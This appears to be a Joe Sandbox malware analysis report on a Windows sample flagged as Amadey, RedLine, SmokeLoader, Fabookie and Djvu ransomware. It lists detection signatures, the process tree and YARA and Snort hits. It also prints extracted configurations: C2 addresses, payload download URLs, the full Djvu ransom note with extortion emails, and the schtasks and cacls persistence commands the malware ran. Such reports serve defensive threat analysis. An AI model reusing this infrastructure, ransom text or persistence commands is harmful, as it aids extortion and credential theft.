Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ej3vSx3p8Y.exe

Overview

General Information

Sample Name:Ej3vSx3p8Y.exe
Analysis ID:778231
MD5:0fc582c0c4d53b3c6e5b23d3cca924a2
SHA1:cf6eaf786b7e85095382ca1442f8fe5f820b70a7
SHA256:ad512590da930d6b06df411c5dd9b65efff702b5abfb9f2e84f8ea043b753213
Tags:Amadeyexe
Infos:

Detection

Amadey, Djvu, Fabookie, RedLine, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Yara detected Fabookie
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Found stalling execution ending in API Sleep call
Connects to many ports of the same IP (likely port scanning)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current machine is a virtual machine (disk enumeration)
Sample uses process hollowing technique
Detected VMProtect packer
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Tries to steal Instant Messenger accounts or passwords
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Uses cacls to modify the permissions of files
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

  • System is w10x64
  • Ej3vSx3p8Y.exe (PID: 5492 cmdline: C:\Users\user\Desktop\Ej3vSx3p8Y.exe MD5: 0FC582C0C4D53B3C6E5B23D3CCA924A2)
    • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 6267.exe (PID: 4996 cmdline: C:\Users\user\AppData\Local\Temp\6267.exe MD5: 868ACB586930934B250C949E4C3E180E)
        • nbveek.exe (PID: 5324 cmdline: "C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe" MD5: 868ACB586930934B250C949E4C3E180E)
          • schtasks.exe (PID: 4608 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 2064 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "user:N"&&CACLS "nbveek.exe" /P "user:R" /E&&echo Y|CACLS "..\cb465ca805" /P "user:N"&&CACLS "..\cb465ca805" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • cmd.exe (PID: 4084 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • cacls.exe (PID: 2528 cmdline: CACLS "nbveek.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
            • cacls.exe (PID: 3192 cmdline: CACLS "nbveek.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
            • cmd.exe (PID: 4892 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • cacls.exe (PID: 6000 cmdline: CACLS "..\cb465ca805" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
            • cacls.exe (PID: 1716 cmdline: CACLS "..\cb465ca805" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • rundll32.exe (PID: 4188 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • Legno.exe (PID: 5760 cmdline: "C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe" MD5: BC45F9797F848DF442A883F994ADAD4A)
            • nbveek.exe (PID: 2192 cmdline: "C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe" MD5: BC45F9797F848DF442A883F994ADAD4A)
              • schtasks.exe (PID: 4040 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
                • conhost.exe (PID: 476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • cmd.exe (PID: 3664 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "user:N"&&CACLS "nbveek.exe" /P "user:R" /E&&echo Y|CACLS "..\5ca56b659f" /P "user:N"&&CACLS "..\5ca56b659f" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
                • conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • anon.exe (PID: 1700 cmdline: "C:\Users\user\AppData\Local\Temp\1000014001\anon.exe" MD5: E2D0B894694E83BF28B18A634504F131)
          • nbveek.exe (PID: 5276 cmdline: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe MD5: 868ACB586930934B250C949E4C3E180E)
            • chrome.exe (PID: 3048 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
              • chrome.exe (PID: 4992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1864 --field-trial-handle=1880,i,6220591727582463305,5376783925534799791,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
            • chrome.exe (PID: 6256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
      • 65C3.exe (PID: 4620 cmdline: C:\Users\user\AppData\Local\Temp\65C3.exe MD5: 868ACB586930934B250C949E4C3E180E)
        • nbveek.exe (PID: 2372 cmdline: "C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe" MD5: 868ACB586930934B250C949E4C3E180E)
      • 6D94.exe (PID: 5332 cmdline: C:\Users\user\AppData\Local\Temp\6D94.exe MD5: FFD6FCCF4EBA94F39A66C3AB4E1DB54E)
      • 79AB.exe (PID: 5036 cmdline: C:\Users\user\AppData\Local\Temp\79AB.exe MD5: 25B78BEA81EFF1119CDD474FED74E295)
      • 7E5F.exe (PID: 3584 cmdline: C:\Users\user\AppData\Local\Temp\7E5F.exe MD5: 3DC3A1679199E497DC2248616FF71002)
      • 8C99.exe (PID: 5936 cmdline: C:\Users\user\AppData\Local\Temp\8C99.exe MD5: 20F88F67297070067A7CF9A17BCD8904)
        • nbveek.exe (PID: 1924 cmdline: "C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe" MD5: 20F88F67297070067A7CF9A17BCD8904)
      • 8FF5.exe (PID: 6108 cmdline: C:\Users\user\AppData\Local\Temp\8FF5.exe MD5: 20F88F67297070067A7CF9A17BCD8904)
        • nbveek.exe (PID: 4168 cmdline: "C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe" MD5: 20F88F67297070067A7CF9A17BCD8904)
          • schtasks.exe (PID: 5272 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 3644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • AAE1.exe (PID: 2972 cmdline: C:\Users\user\AppData\Local\Temp\AAE1.exe MD5: A14001B42E3E4F1199A4DA5BECED8766)
      • CEE7.exe (PID: 4856 cmdline: C:\Users\user\AppData\Local\Temp\CEE7.exe MD5: A14001B42E3E4F1199A4DA5BECED8766)
  • fgifwju (PID: 3172 cmdline: C:\Users\user\AppData\Roaming\fgifwju MD5: 0FC582C0C4D53B3C6E5B23D3CCA924A2)
  • cleanup
{"C2 url": "45.32.200.113/mBsjv2swweP/index.php", "Version": "3.63"}
{"Download URLs": ["http://uaery.top/dl/build2.exe", "http://ex3mall.com/files/1/build3.exe"], "C2 url": "http://ex3mall.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-OKSOfVy04R\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0625Sduef", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz1O56LTB0gW4dHcMmTX4\\\\n\\/1ZZ4JUq5WGkoDuf27oi6GVjUmmr1RIAMPVQgxQWuMEjs7\\/uogsCiGhhbLbY5YnZ\\\\ngmAuWIrSZeqWDFKepUNBMX7G9tiDribYq8XFy8ivJKN5QPjWPqyBnDWFTnM69iLp\\\\ndF6v2ohxVDnJ2XHgO42FwyRk3sdYFi2SR87iPebh9PEexSNXVv4lqKPKTd9bShQl\\\\nxQSyYZPdeOrLxDE3+YXZQbwucCJGH1NNWi1WYwriA6YsFMeHiKHRmLHUtYOUy85F\\\\nwl+kZMOyfnLVqc+aYoYl7DSto4fWWo8GJLfR0edDhMA4+UdiRpwOZr37c07jLV9L\\\\n7wIDAQAB\\\\n-----END PUBLIC KEY-----"}
{"C2 url": ["82.115.223.15:15486"], "Bot Id": "555555555444", "Authorization Header": "fa8c71d3a5d6db7cd0d5296040b25f89"}
{"C2 list": ["http://skinndia.com/tmp/", "http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_FabookieYara detected FabookieJoe Security
    dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
      dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\anon[1].exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\anon[1].exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1a460:$pat14: , CommandLine:
          • 0x134a5:$v2_1: ListOfProcesses
          • 0x13284:$v4_3: base64str
          • 0x13dfd:$v4_4: stringKey
          • 0x11b6a:$v4_5: BytesToStringConverted
          • 0x10d76:$v4_6: FromBase64
          • 0x1209f:$v4_8: procName
          • 0x12817:$v5_5: FileScanning
          • 0x11d73:$v5_7: RecordHeaderField
          • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
          C:\Users\user\AppData\Local\Temp\Amadey.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Legno[1].exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                Click to see the 25 entries
                SourceRuleDescriptionAuthorStrings
                0000000D.00000000.474324647.00000000001C1000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  0000000D.00000000.474123082.00000000001C1000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    00000000.00000002.447907484.0000000002EC2000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
                    • 0x706f:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
                    0000000F.00000003.499378760.0000000003F59000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      00000010.00000002.820966008.00000000007B3000.00000040.00000800.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
                      • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
                      Click to see the 68 entries
                      SourceRuleDescriptionAuthorStrings
                      40.2.AAE1.exe.4b57f90.1.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        20.2.79AB.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                          30.0.8C99.exe.b0000.1.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            30.0.8C99.exe.b0000.3.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                              13.0.6267.exe.1c0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                                Click to see the 48 entries
                                No Sigma rule has matched
                                Timestamp:192.168.2.462.204.41.10950470802027700 01/05/23-09:00:34.032606
                                SID:2027700
                                Source Port:50470
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950700802027700 01/05/23-09:00:56.499134
                                SID:2027700
                                Source Port:50700
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949946802027700 01/05/23-08:59:21.997477
                                SID:2027700
                                Source Port:49946
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349904802027700 01/05/23-08:59:12.809770
                                SID:2027700
                                Source Port:49904
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950246802027700 01/05/23-09:00:05.577202
                                SID:2027700
                                Source Port:50246
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350679802027700 01/05/23-09:00:54.414273
                                SID:2027700
                                Source Port:50679
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350327802027700 01/05/23-09:00:15.880549
                                SID:2027700
                                Source Port:50327
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350618802027700 01/05/23-09:00:46.603128
                                SID:2027700
                                Source Port:50618
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350814802027700 01/05/23-09:01:06.461908
                                SID:2027700
                                Source Port:50814
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950397802027700 01/05/23-09:00:23.771644
                                SID:2027700
                                Source Port:50397
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350545802027700 01/05/23-09:00:40.513730
                                SID:2027700
                                Source Port:50545
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950241802027700 01/05/23-09:00:05.051153
                                SID:2027700
                                Source Port:50241
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949778802027700 01/05/23-08:58:47.873482
                                SID:2027700
                                Source Port:49778
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350383802027700 01/05/23-09:00:22.389862
                                SID:2027700
                                Source Port:50383
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349960802027700 01/05/23-08:59:25.113378
                                SID:2027700
                                Source Port:49960
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350450802027700 01/05/23-09:00:29.302149
                                SID:2027700
                                Source Port:50450
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350708802027700 01/05/23-09:00:57.245734
                                SID:2027700
                                Source Port:50708
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950123802027700 01/05/23-08:59:52.426983
                                SID:2027700
                                Source Port:50123
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350400802027700 01/05/23-09:00:23.939977
                                SID:2027700
                                Source Port:50400
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350613802027700 01/05/23-09:00:46.098638
                                SID:2027700
                                Source Port:50613
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949979802027700 01/05/23-08:59:28.724139
                                SID:2027700
                                Source Port:49979
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350092802027700 01/05/23-08:59:49.055684
                                SID:2027700
                                Source Port:50092
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350417802027700 01/05/23-09:00:25.494101
                                SID:2027700
                                Source Port:50417
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.482.115.223.1550575154862850027 01/05/23-09:00:44.625462
                                SID:2850027
                                Source Port:50575
                                Destination Port:15486
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349965802027700 01/05/23-08:59:25.927605
                                SID:2027700
                                Source Port:49965
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950414802027700 01/05/23-09:00:25.340531
                                SID:2027700
                                Source Port:50414
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950012802027700 01/05/23-08:59:33.619724
                                SID:2027700
                                Source Port:50012
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950509802027700 01/05/23-09:00:37.152244
                                SID:2027700
                                Source Port:50509
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350298802027700 01/05/23-09:00:10.484724
                                SID:2027700
                                Source Port:50298
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349887802027700 01/05/23-08:59:10.854546
                                SID:2027700
                                Source Port:49887
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950017802027700 01/05/23-08:59:34.602269
                                SID:2027700
                                Source Port:50017
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949828802027700 01/05/23-08:58:57.542304
                                SID:2027700
                                Source Port:49828
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350630802027700 01/05/23-09:00:47.970193
                                SID:2027700
                                Source Port:50630
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350142802027700 01/05/23-08:59:54.079286
                                SID:2027700
                                Source Port:50142
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950799802027700 01/05/23-09:01:05.218226
                                SID:2027700
                                Source Port:50799
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950447802027700 01/05/23-09:00:28.567777
                                SID:2027700
                                Source Port:50447
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950738802027700 01/05/23-09:01:00.070658
                                SID:2027700
                                Source Port:50738
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350455802027700 01/05/23-09:00:29.836120
                                SID:2027700
                                Source Port:50455
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950683802027700 01/05/23-09:00:54.918761
                                SID:2027700
                                Source Port:50683
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950331802027700 01/05/23-09:00:16.345302
                                SID:2027700
                                Source Port:50331
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350287802027700 01/05/23-09:00:09.524033
                                SID:2027700
                                Source Port:50287
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350405802027700 01/05/23-09:00:24.377125
                                SID:2027700
                                Source Port:50405
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349842802027700 01/05/23-08:59:03.418785
                                SID:2027700
                                Source Port:49842
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949773802027700 01/05/23-08:58:45.937667
                                SID:2027700
                                Source Port:49773
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950184802027700 01/05/23-08:59:59.403497
                                SID:2027700
                                Source Port:50184
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950650802027700 01/05/23-09:00:52.395738
                                SID:2027700
                                Source Port:50650
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350718802027700 01/05/23-09:00:58.061459
                                SID:2027700
                                Source Port:50718
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949740802027700 01/05/23-08:58:29.781479
                                SID:2027700
                                Source Port:49740
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350031802027700 01/05/23-08:59:40.782287
                                SID:2027700
                                Source Port:50031
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949901802027700 01/05/23-08:59:12.535136
                                SID:2027700
                                Source Port:49901
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350393802027700 01/05/23-09:00:23.404702
                                SID:2027700
                                Source Port:50393
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.482.115.223.1550575154862850286 01/05/23-09:01:17.056801
                                SID:2850286
                                Source Port:50575
                                Destination Port:15486
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350557802027700 01/05/23-09:00:41.555872
                                SID:2027700
                                Source Port:50557
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350635802027700 01/05/23-09:00:48.498508
                                SID:2027700
                                Source Port:50635
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350277802027700 01/05/23-09:00:08.495677
                                SID:2027700
